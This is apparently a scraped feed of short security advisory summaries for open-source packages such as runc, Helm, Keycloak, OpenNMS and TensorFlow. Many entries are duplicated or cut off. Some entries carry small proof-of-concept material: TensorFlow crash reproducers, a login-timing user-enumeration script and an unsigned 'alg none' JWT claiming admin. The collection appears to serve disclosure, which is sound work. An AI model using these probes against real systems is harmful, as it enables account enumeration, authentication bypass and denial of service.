An argument injection vulnerability in the Dragonfly gem for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
The trim-newlines package for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the .end() method.
A flaw was found in the ZeroMQ server. This flaw allows a malicious client to cause a stack buffer overflow on the server by sending crafted topic subscription requests and then unsubscribing. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
The css-what package for Node.js does not ensure that attribute parsing has linear time complexity relative to the size of the input.
Impact: If you are using the esbuild target or command, you are at risk of code/option injection. Attackers can use the command line option to maliciously change your settings in order to damage your project. Patches: The problem has been patched in v1.0.0, as it uses a proper method to pass configs to esbuild/estrella. Workarounds: There is no workaround; you should update ASAP. Notes: This notice is mainly just …
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in tinymce.
Http4s is a Scala interface for HTTP services. StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns F[None], indicating no resource, if url.getFile is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL …
A flaw was found in Keycloak. A self-stored XSS attack vector escalating to a complete account takeover is possible due to user-supplied data fields not being properly encoded and JavaScript code being used to process the data. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
A vulnerability exists in the SAML connector of the github.com/dexidp/dex library used to process SAML Signature Validation. This flaw allows an attacker to bypass SAML authentication. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
A flaw was found in Keycloak where it is possible to update the user's metadata attributes using the Account REST API. This flaw allows an attacker to change their own NameID attribute to impersonate the admin user for any particular application.
XStream is software for serializing Java objects to XML and back again. A vulnerability in XStream may allow a remote attacker who has sufficient rights to execute commands on the host only by manipulating the processed input stream.
Impact: Anyone verifying a Stripe webhook request via this library's constructEvent function. Patches: Upgrade to … Workarounds: Use await verifyHeader(…) directly instead of constructEvent. References: https://github.com/worker-tools/stripe-webhook/issues/1
An attacker may be able to push a malicious container to the default remote endpoint with a URI that is identical to the URI used by a victim with a non-default remote endpoint, thus executing the malicious container. Only action commands against library:// URIs are affected. Other commands such as pull / push respect the configured remote endpoint.
runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)
runc through 1.0.0-rc9 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. (This vulnerability does not affect Docker due to an implementation detail that happens to block the attack.)
Tenancy multi-tenant is an open source multi-domain controller for the Laravel web framework. In some situations, it is possible to have open redirects where users can be redirected from your site to any other site using a specially crafted URL. This is only the case for installations where the default Hostname Identification is used and the environment uses tenants that have force_https set to true (the default is false).
In Weave Net before version 2.6.3, an attacker able to run a process as root in a container is able to respond to DNS requests from the host and thereby insert themselves as a fake service. In a cluster with an IPv4 internal network, if IPv6 is not totally disabled on the host (via ipv6.disable=1 on the kernel cmdline), it will be either unconfigured or configured on some interfaces, but …
There is a possible information disclosure / unintended method execution vulnerability in Action Pack when using the redirect_to or polymorphic_url helper with untrusted user input.
There is a possible information disclosure / unintended method execution vulnerability in Action Pack when using the redirect_to or polymorphic_url helper with untrusted user input.
runc allows a Container Filesystem Breakout via Directory Traversal. To exploit the vulnerability, an attacker must be able to create multiple containers with a fairly specific mount configuration. The problem occurs via a symlink-exchange attack that relies on a race condition.
Http4s is a Scala interface for HTTP services. StaticFile.fromUrl can leak the presence of a directory on a server when the URL scheme is not file://, and the URL points to a fetchable resource under its scheme and authority. The function returns F[None], indicating no resource, if url.getFile is a directory, without first checking the scheme or authority of the URL. If a URL connection to the scheme and URL …
Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a …
Tendermint before versions 0.33.3, 0.32.10, and 0.31.12 has a denial-of-service vulnerability. Tendermint does not limit the number of P2P connection requests. For each p2p connection, it allocates XXX bytes. Even though this memory is garbage collected once the connection is terminated (due to duplicate IP or reaching a maximum number of inbound peers), temporary memory spikes can lead to OOM (Out-Of-Memory) exceptions. Additionally, Tendermint does not reclaim activeID of a …
User enumeration in database authentication in Flask-AppBuilder <= 3.2.3. Allows a non-authenticated user to enumerate existing accounts by timing the server's response time when logging in.
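A minimal sketch of how such a timing oracle might be measured, assuming a hypothetical /login/ endpoint and target host; the URL, field names, and host are illustrative only and not taken from Flask-AppBuilder itself.

import time
import requests  # third-party HTTP client, used only for this illustration

def login_time(base_url, username, password="wrong-password"):
    # Time how long the login endpoint takes to reject a credential pair.
    start = time.monotonic()
    requests.post(f"{base_url}/login/", data={"username": username, "password": password})
    return time.monotonic() - start

# If the password hash is only computed for accounts that exist, existing
# usernames tend to respond measurably slower than unknown ones.
if __name__ == "__main__":
    base = "http://target.example"  # hypothetical target
    for name in ("admin", "no-such-user"):
        print(name, round(login_time(base, name), 3), "s")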
There's a security issue in prosody-filer versions < 1.0.1 which leads to unwanted directory listings of download directories. An attacker is able to list previous uploads of a certain user by shortening the URL and accessing a URL subdirectory other than /upload/ (or the corresponding user-defined root dir). Version 1.0.1 and later fix this problem and allow only direct file access if the full path is known. Directory listings …
A flaw was found in the KubeVirt main virt-handler regarding the access permissions of virt-handler. An attacker with access to create VMs could attach any secret within their namespace, allowing them to read the contents of that secret.
Istio has a remotely exploitable vulnerability where an HTTP request path with multiple slashes or escaped slash characters (%2F or %5C) could potentially bypass an Istio authorization policy when path based authorization rules are used.
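A simplified illustration of the path-matching gap described above; the deny rule, helper names, and sample paths are hypothetical and do not reproduce Istio's actual policy engine.

import re
from urllib.parse import unquote

DENIED_PATH = "/admin/secret"  # illustrative authorization rule

def naive_is_denied(path: str) -> bool:
    # Matches only the raw request path, so "/admin//secret" or
    # "/admin%2Fsecret" slips past the rule.
    return path == DENIED_PATH

def normalized_is_denied(path: str) -> bool:
    # Decode escaped slashes and collapse duplicate slashes before
    # matching, the kind of normalization the fix relies on.
    decoded = unquote(path.replace("%5C", "/").replace("%5c", "/"))
    return re.sub(r"/+", "/", decoded) == DENIED_PATH

for candidate in ("/admin/secret", "/admin//secret", "/admin%2Fsecret", "/admin%5Csecret"):
    print(candidate, naive_is_denied(candidate), normalized_is_denied(candidate))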
A flaw was found in the OpenShift web console, where the access token is stored in the browser's local storage. An attacker can use this flaw to get the access token via physical access, or an XSS attack on the victim's browser.
Spring Framework WebFlux applications are vulnerable to a privilege escalation. By (re)creating the temporary storage directory, a locally authenticated malicious user can read or modify files that have been uploaded to the WebFlux application, or overwrite arbitrary files with multipart request data.
A possible information disclosure / unintended method execution vulnerability in Action Pack when using the redirect_to or polymorphic_url helper with untrusted user input.
There is an information disclosure vulnerability in Helm from version 3.1.0 and before version 3.2.0. lookup is a Helm template function introduced in Helm v3. It is able to look up resources in the cluster to check for the existence of specific resources and get details about them. This can be used as part of the process to render templates. The documented behavior of helm template states that it does not …
A cross-site scripting (XSS) flaw was found in RESTEasy where it does not properly handle URL encoding when the RESTEASY003870 exception occurs. An attacker could use this flaw to launch a reflected XSS attack.
In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using the client authentication method 'private_key_jwt' [1], the OpenID specification says the following about the assertion jti: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness …
In Hydra (an OAuth2 Server and OpenID Certified™ OpenID Connect Provider written in Go), before version 1.4.0+oryOS.17, when using the client authentication method 'private_key_jwt' [1], the OpenID specification says the following about the assertion jti: "A unique identifier for the token, which can be used to prevent reuse of the token. These tokens MUST only be used once, unless conditions for reuse were negotiated between the parties". Hydra does not check the uniqueness …
A flaw was found in RESTEasy, where an incorrect response to an HTTP request is provided. This flaw allows an attacker to gain access to privileged information. The highest threat from this vulnerability is to confidentiality and integrity. Versions before resteasy Alpha3 are affected.
Prototype pollution vulnerability in 'js-extend' allows an attacker to cause a denial of service and may lead to remote code execution.
If Apache Pulsar is configured to authenticate clients using tokens based on JSON Web Tokens (JWT), the signature of the token is not validated if the algorithm of the presented token is set to "none". This allows an attacker to connect to Pulsar instances as any user (incl. admins).
If Apache Pulsar is configured to authenticate clients using tokens based on JSON Web Tokens (JWT), the signature of the token is not validated if the algorithm of the presented token is set to "none". This allows an attacker to connect to Pulsar instances as any user (incl. admins).
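For illustration, this is roughly what an unsigned token looks like when the declared algorithm is "none"; the claim values are made up, and the sketch assumes a verifier that honours the declared algorithm instead of enforcing an expected one.

import base64
import json

def b64url(data: bytes) -> str:
    # JWTs use unpadded base64url segments.
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

# An unsigned token: the header declares alg "none" and the signature
# segment is left empty, so a verifier that honours "none" accepts any claims.
header = {"alg": "none", "typ": "JWT"}
claims = {"sub": "admin"}  # illustrative claim only
token = ".".join([b64url(json.dumps(header).encode()),
                  b64url(json.dumps(claims).encode()),
                  ""])
print(token)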
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in json-ptr.
In the Jakarta Expression Language implementation, a bug in the ELParserTokenManager enables invalid EL expressions to be evaluated as if they were valid.
In the Jakarta Expression Language implementation, a bug in the ELParserTokenManager enables invalid EL expressions to be evaluated as if they were valid.
The dep_description (Dependency Description) and dep_name (Dependency Name) parameters are vulnerable to stored XSS.
OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the allowlist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if an allowlist domain was configured for …
OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the allowlist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if an allowlist domain was configured for …
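A simplified sketch of the suffix-matching pitfall described above, using made-up domain names and helper functions rather than OAuth2 Proxy's actual code.

def naive_redirect_allowed(host: str, allowed_domain: str) -> bool:
    # A plain suffix comparison: "evilexample.com" ends with "example.com",
    # so it is accepted alongside the intended domain.
    return host.endswith(allowed_domain)

def stricter_redirect_allowed(host: str, allowed_domain: str) -> bool:
    # Require an exact match or a real subdomain boundary.
    return host == allowed_domain or host.endswith("." + allowed_domain)

for host in ("example.com", "login.example.com", "evilexample.com"):
    print(host,
          naive_redirect_allowed(host, "example.com"),
          stricter_redirect_allowed(host, "example.com"))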
git-bug before 0.7.2 has an Uncontrolled Search Path Element. It will execute git.bat from the current directory in certain PATH situations (most often seen on Windows).
git-bug before 0.7.2 has an Uncontrolled Search Path Element. It will execute git.bat from the current directory in certain PATH situations (most often seen on Windows).
ws is an open source WebSocket client and server library for Node. In vulnerable versions of ws, the issue can be mitigated by reducing the maximum allowed length of the request headers.
Prototype pollution vulnerability in 'deep-defaults' allows an attacker to cause a denial of service and may lead to remote code execution.
Prototype pollution vulnerability in nconf-toml allows an attacker to cause a denial of service and may lead to remote code execution.
Pion WebRTC before 3.0.15 didn't properly tear down the DTLS connection when certificate verification failed. The PeerConnectionState was set to failed, but a user could ignore that and continue to use the PeerConnection. (A WebRTC implementation shouldn't allow the user to continue if verification has failed.)
Jenkins Filesystem Trigger Plugin does not configure its XML parser to prevent XML external entity (XXE) attacks.
Jenkins URLTrigger Plugin does not configure its XML parser to prevent XML external entity (XXE) attacks.
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting, since there is no validation on the input being sent to the name parameter in the noticeWizard endpoint. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files.
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting, since the function validateFormInput() performs improper validation checks on the input sent to the groupName and groupComment parameters. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files, which can cause severe damage to the organization using OpenNMS.
A flaw was found in Wildfly in versions before 23.0.2.Final. While creating a new role in domain mode via the admin console, it is possible to add a payload in the name field, leading to XSS. This affects Confidentiality and Integrity.
runc before 1.0.0-rc95 allows a Container Filesystem Breakout via Directory Traversal. To exploit the vulnerability, an attacker must be able to create multiple containers with a fairly specific mount configuration. The problem occurs via a symlink-exchange attack that relies on a race condition.
A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application …
A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized.
A DNS proxy and possible amplification attack vulnerability in WebClientInfo of Apache Wicket allows an attacker to trigger arbitrary DNS lookups from the server when the X-Forwarded-For header is not properly sanitized. This DNS lookup can be engineered to overload an internal DNS server or to slow down request processing of the Apache Wicket application causing a possible denial of service on either the internal infrastructure or the web application …
This advisory has been marked as False Positive and has been removed.
The Pixar ruby-jss gem allows remote attackers to execute arbitrary code because of the Plist gem's documented behavior of using Marshal.load during XML document processing.
Jenkins Markdown Formatter Plugin does not sanitize crafted link target URLs, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with the ability to edit any description rendered using the configured markup formatter.
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection, and since there is no validation of an existing user name while renaming a user. As a result, privileges of the renamed user are being overwritten by the old user and the old user is being deleted from the user list.
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection at /opennms/admin/userGroupView/users/updateUser. This flaw allows assigning the ROLE_ADMIN security role to a normal user. Using this flaw, an attacker can trick the admin user into assigning administrator privileges to a normal user by enticing them to click on an attacker-controlled website.
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to CSRF, due to no CSRF protection, and since there is no validation of an existing user name while renaming a user. As a result, privileges of the renamed user are being overwritten by the old user and the old user is being deleted from the user list.
In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …
In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …
In Helm before versions 2.16.11 and 3.3.2, a Helm repository can contain duplicates of the same chart, with the last one always used. If a repository is compromised, this lowers the level of access that an attacker needs to inject a bad chart into a repository. To perform this attack, an attacker must have write access to the index file (which can occur during a MITM attack on a non-SSL …
The trailing-slash package is vulnerable to Open Redirect via the use of trailing double slashes in the URL when accessing the vulnerable endpoint.
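For context, a redirect target that begins with a double slash is protocol-relative, so the browser keeps the current scheme but switches to the attacker's host; the hostnames below are illustrative only.

from urllib.parse import urljoin

current_page = "https://app.example/start"
for location in ("/dashboard", "//evil.example/phish"):
    # "/dashboard" stays on app.example, while "//evil.example/phish"
    # resolves to an entirely different origin.
    print(location, "->", urljoin(current_page, location))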
The direct_mail extension through 5.2.3 for TYPO3 has an Open Redirect via jumpUrl.
cloudflared versions prior to 2020.8.1 contain a local privilege escalation vulnerability on Windows systems. When run on a Windows system, cloudflared searches for configuration files which could be abused by a malicious entity to execute commands as a privileged user. Version 2020.8.1 fixes this issue.
The normalize-url package for Node.js has a ReDoS (regular expression denial of service) issue because it has exponential performance for data: URLs.
An authentication bypass exists in goxmldsig, the library this package uses to determine if SAML assertions are genuine. An attacker could craft a SAML response that would appear to be valid but would not have been genuinely issued by the IDP.
Impact: Given a valid SAML Response, an attacker can potentially modify the document, bypassing signature validation in order to pass off the altered document as a signed one. This enables a variety of attacks, including users accessing accounts other than the one to which they authenticated in the identity provider, or full authentication bypass if an external attacker can obtain an expired, signed SAML Response. Patches: A patch is available, …
In Feehi CMS, when the user modifies the HTTP Referer header to any URL, the server can make a request to it.
A flaw was found in OpenLDAP. This flaw allows an attacker who can send a malicious packet to be processed by OpenLDAP’s slapd server, to trigger an assertion failure. The highest threat from this vulnerability is to system availability.
Dutchcoders transfer.sh allows Directory Traversal for deleting files.
In teler before version 0.0.1, if you run teler inside a Docker container and the errors.Exit function is encountered, it will cause a denial of service (SIGSEGV) because it does not properly obtain the process ID and process group ID of teler before attempting to kill them. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1.
In teler before version 0.0.1, if you run teler inside a Docker container and the errors.Exit function is encountered, it will cause a denial of service (SIGSEGV) because it does not properly obtain the process ID and process group ID of teler before attempting to kill them. The issue is patched in teler 0.0.1 and 0.0.1-dev5.1.
Harbor 1.9.*, 1.10.*, and 2.0.* allows Exposure of Sensitive Information to an Unauthorized Actor.
Harbor 1.9.*, 1.10.*, and 2.0.* allows Exposure of Sensitive Information to an Unauthorized Actor.
Keystone 5 is an open source CMS platform to build Node.js applications. This security advisory relates to a newly discovered capability in our query infrastructure to directly or indirectly expose the values of private fields, bypassing the configured access control.
containerd is an industry-standard container runtime and is available as a daemon for Linux and Windows. In containerd before versions 1.3.9 and 1.4.3, the containerd-shim API is improperly exposed to host network containers. Access controls for the shim’s API socket verified that the connecting process had an effective UID of 0, but did not otherwise restrict access to the abstract Unix domain socket. This would allow malicious containers running in …
In goxmldsig (XML Digital Signatures implemented in pure Go) before version 1.1.0, with a carefully crafted XML file, an attacker can completely bypass signature validation and pass off an altered file as a signed one. A patch is available; all users of goxmldsig should upgrade to at least revision f6188febf0c29d7ffe26a0436212b19cb9615e64 or version 1.1.0.
In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …
In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …
In Helm before versions 2.16.11 and 3.3.2, a Helm plugin can contain duplicates of the same entry, with the last one always used. If a plugin is compromised, this lowers the level of access that an attacker needs to modify a plugin's install hooks, causing a local execution attack. To perform this attack, an attacker must have write access to the git repository or plugin archive (.tgz) while being downloaded …
In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …
In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …
In Helm before versions 2.16.11 and 3.3.2 there is a bug in which the alias field on a Chart.yaml is not properly sanitized. This could lead to the injection of unwanted information into a chart. This issue has been patched in Helm 3.3.2 and 2.16.11. A possible workaround is to manually review the dependencies field of any untrusted chart, verifying that the alias field is either not used, or (if …
In Helm before versions 2.16.11 and 3.3.2, plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm --help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …
In Helm before versions 2.16.11 and 3.3.2, plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm --help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …
In Helm before versions 2.16.11 and 3.3.2, plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to helm --help. This issue has been patched in Helm 3.3.2. A possible workaround is to not install untrusted Helm plugins. Examine the name field …
Singularity (an open source container platform) from version 3.1.1 through 3.6.3 has a vulnerability. Due to insecure handling of path traversal and the lack of path sanitization within unsquashfs, it is possible to overwrite/create any files on the host filesystem during the extraction with a crafted squashfs filesystem. The extraction occurs automatically for an unprivileged (either installation or with allow setuid = no) run of Singularity when a user attempts to …
In ORY Fosite (the security-first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the TokenRevocationHandler ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this to their advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0.
In ORY Fosite (the security-first OAuth2 & OpenID Connect framework for Go) before version 0.34.0, the TokenRevocationHandler ignores errors coming from the storage. This can lead to unexpected 200 status codes indicating successful revocation while the token is still valid. Whether an attacker can use this to their advantage depends on the ability to trigger errors in the store. This is fixed in version 0.34.0.
Sylabs Singularity through 3.6.2 has Insecure Permissions on temporary directories used in explicit and implicit container build operations, a different vulnerability than CVE-2020-25039.
A reflected cross-site scripting (XSS) vulnerability in Shopizer allows remote attackers to inject arbitrary web script or HTML via the ref parameter to a page about an arbitrary product, e.g., a product/insert-product-name-here.html/ref= URL.
A stored cross-site scripting (XSS) vulnerability in Shopizer allows remote attackers to inject arbitrary web script or HTML via customer_name in various forms of store administration.
Dutchcoders transfer.sh allows XSS via an inline view.
The @ronomon/opened library contains a command injection vulnerability which would allow a remote attacker to execute commands on the system if the library was used with untrusted input.
The direct_mail extension through 5.2.3 for TYPO3 allows Denial of Service via log entries.
@alovak found that, currently, when we build the hash of an account number we do not "salt" it, which makes it vulnerable to a rainbow table attack. What did you expect to see? I expected a salt (some random number from configuration) to be used in hash.AccountNumber. I would generate a salt per tenant at least (maybe per organization).
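A rough sketch of the difference being requested, assuming SHA-256; the function names and salt handling are illustrative and not the project's actual hash.AccountNumber implementation.

import hashlib
import hmac
import secrets

def unsalted(account_number: str) -> str:
    # Identical account numbers always hash to the same value, so a
    # precomputed (rainbow) table over the account-number space reverses it.
    return hashlib.sha256(account_number.encode()).hexdigest()

def salted(account_number: str, tenant_salt: bytes) -> str:
    # Mixing in a per-tenant random secret makes precomputed tables useless.
    return hmac.new(tenant_salt, account_number.encode(), hashlib.sha256).hexdigest()

tenant_salt = secrets.token_bytes(32)  # e.g. generated once per tenant and kept in configuration
print(unsalted("12345678"))
print(salted("12345678", tenant_salt))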
A use-after-free was found due to a thread being killed too early. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
Pomerium before 0.13.4 has an Open Redirect (issue 1 of 2).
Pomerium before 0.13.4 has an Open Redirect (issue 1 of 2).
Pomerium from version 0.10.0 through 0.13.3 has an Open Redirect in the user sign-in/out process.
Pomerium from version 0.10.0 through 0.13.3 has an Open Redirect in the user sign-in/out process.
The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)
The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)
The implementation of tf.raw_ops.MaxPool3DGradGrad exhibits undefined behavior by dereferencing null pointers backing attacker-supplied empty tensors: import tensorflow as tf orig_input = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) orig_output = tf.constant([0.0], shape=[1, 1, 1, 1, 1], dtype=tf.float32) grad = tf.constant([], shape=[0, 0, 0, 0, 0], dtype=tf.float32) ksize = [1, 1, 1, 1, 1] strides = [1, 1, 1, 1, 1] padding = "SAME" tf.raw_ops.MaxPool3DGradGrad( orig_input=orig_input, orig_output=orig_output, grad=grad, ksize=ksize, strides=strides, padding=padding)
The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …
The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …
The implementation of tf.raw_ops.FractionalMaxPoolGrad triggers an undefined behavior if one of the input tensors is empty: import tensorflow as tf orig_input = tf.constant([2, 3], shape=[1, 1, 1, 2], dtype=tf.int64) orig_output = tf.constant([], dtype=tf.int64) out_backprop = tf.zeros([2, 3, 6, 6], dtype=tf.int64) row_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) col_pooling_sequence = tf.constant([0], shape=[1], dtype=tf.int64) tf.raw_ops.FractionalMaxPoolGrad( orig_input=orig_input, orig_output=orig_output, out_backprop=out_backprop, row_pooling_sequence=row_pooling_sequence, col_pooling_sequence=col_pooling_sequence, overlapping=False) The code is also vulnerable to a denial of service attack as a …
Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors results in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …
Calling TF operations with tensors of non-numeric types when the operations expect numeric tensors results in null pointer dereferences. There are multiple ways to reproduce this, listing a few examples here: import tensorflow as tf import numpy as np data = tf.random.truncated_normal(shape=1,mean=np.float32(20.8739),stddev=779.973,dtype=20,seed=64) import tensorflow as tf import numpy as np data = tf.random.stateless_truncated_normal(shape=1,seed=[63,70],mean=np.float32(20.8739),stddev=779.973,dtype=20) import tensorflow as tf import numpy as np data = tf.one_hot(indices=[62,50],depth=136,on_value=np.int32(237),off_value=158,axis=856,dtype=20) import tensorflow as tf import numpy …
